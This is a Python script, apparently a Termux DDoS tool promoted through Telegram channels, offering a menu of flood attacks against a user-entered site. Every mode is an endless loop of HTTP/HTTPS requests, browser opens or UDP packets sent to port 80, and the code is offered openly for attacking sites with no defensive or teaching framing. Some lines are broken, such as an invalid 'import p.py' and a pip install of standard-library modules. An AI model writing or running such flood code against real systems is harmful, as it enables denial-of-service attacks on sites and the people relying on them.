import os
os.system("pip install requests socket webbrowser random datetime urllib.request && pkg install sl -y && pkg install figlet -y && pkg install ruby -y && pkg install curl -y && gem install lolcat && pkg install toilet -y")
import random
import socket
import webbrowser  
import urllib.request                                         
import random    
import requests
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 80
def back():
    #os.system("sl")
    os.system("clear")
    os.system("toilet -f mono12 -F gay DDOS")
def start():
    global k
    print("""  
#############################################
                                                                                     
telegram channel : t.me/Bad_TM_1                    
coded by : t.me/Mr_Killer_1   
                                                                                                                
[1]http & https                                       
[2]proxy                                                                    
[3]socket                                                                  
[4]All !!!!!                                                                   
                                                                                      
#############################################                                                  
""")
    k = int(input("[#]Bad_TM ----->>> "))
back()
start()
if k == 1:
	back()
	site = input("[#]Enter url---->>> ")
	back()
	while True:
		try:
			urllib.request.urlopen("http://"+site)
			urllib.request.urlopen("https://"+site)
			requests.get("http://"+site)
			requests.get("https://"+site)
			webbrowser.open("http://"+site)
			webbrowser.open("https://"+site)
			print("[#]Attaked ---->>> " + site)
		except:
			back()
			start()
if k == 2:
   import p.py
if k == 3:
    back()
    r = input("Enter Url ---->>>> ")
    back()
    o = socket.gethostbyname(r)
    pa = "Bad_TM"
    while True:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.sendto(bytes(pa,"UTF-8"), (o,port))
        print("[$]Attacked ----->>>>> " + r)
if k == 4:
    back()
    site = input("Enter Your Url ----->>>> ")
    back()
    pa = "Bad_TM"
    o = socket.gethostbyname(site)
    while True:
        try:
            k = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            urllib.request.urlopen("http://"+site)
            urllib.request.urlopen("https://"+site)
            requests.get("http://"+site)
            requests.get("https://"+site)
            webbrowser.open("http://"+site)
            webbrowser.open("https://"+site)
            k.sendto(bytes(pa,"UTF-8"), (o,port))
            print("[#]Attaked ---->>> " + site)
        except:
            back()
            start()
            
